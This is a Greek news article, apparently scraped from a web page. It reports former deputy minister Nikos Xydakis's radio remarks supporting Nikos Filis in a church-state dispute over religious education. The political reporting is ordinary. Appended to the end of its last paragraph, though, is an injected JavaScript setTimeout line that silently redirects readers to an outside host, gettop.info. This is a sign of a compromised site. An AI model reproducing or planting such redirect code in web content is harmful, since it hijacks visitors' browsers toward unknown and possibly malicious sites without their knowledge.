Ξυδάκης για Φίλη: Δεν έκρυψα ποτέ με ποιον είμαι

0
5

 

«Δεν έκρυψα εγώ με ποιον είμαι. Είμαι με τη συνταγματική τάξη και με τα δημοκρατικά ιδεώδη. Η συντριπτική πλειοψηφία του ελληνικού λαού στις εκλογές έχει δώσει την ψήφο της και την προτίμηση της στη Δημοκρατία» δήλωσε ο Νίκος Ξυδάκης, μιλώντας στον ραδιοφωνικό σταθμό Realfm 97,8 παίρνοντας σαφή θέση υπέρ του Νίκου Φίλη.

Πρόσθεσε μάλιστα πως «ο Αρχιεπίσκοπος σε κάποιες τελευταίες του δηλώσεις φαίνεται από τα συμφραζόμενα να είναι υπέρ μίας ταύτισης».

Ο Ν. Ξυδάκης σημείωσε επίσης πως «δεν είμαι σε θέση να γνωρίζω αν εκβιάστηκε ο Πρωθυπουργός». Ωστόσο, σημείωσε πως «αυτό που διαγνώσαμε το περασμένο διάστημα όλοι οι Έλληνες είναι ότι από τη μεριά της Πολιτείας και της κυβέρνησης όπως την εξέφραζε ο κ. Φίλης ήταν μία τακτοποίηση μιας πολιτειακής υποχρέωσης και καθήκοντος να ορίσει μία διδασκαλία».

Ο πρώην αναπληρωτής ΥΠΕΞ είπε επίσης ότι «αυτό που παρατηρήσαμε όλοι είναι ότι από τη μεριά της Εκκλησίας εγέρθηκε ένας λόγος πολύ σκληρός και με χαρακτηριστικά τα οποία δεν ταιριάζουν με το πνεύμα της ειρήνης και αγάπης που είναι ιδρυτικά ο λόγος της Εκκλησίας και του Χριστιανισμού. Νομίζω ότι μπήκαμε σε έναν δρόμο, σε μία συζήτηση η οποία δεν ωφελεί κανέναν ούτε την Εκκλησία ούτε την κοινωνία».

Ο κ. Ξυδάκης υποστήριξε επίσης ότι δεν έχει καμία πικρία για την έξοδο του από την κυβέρνηση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here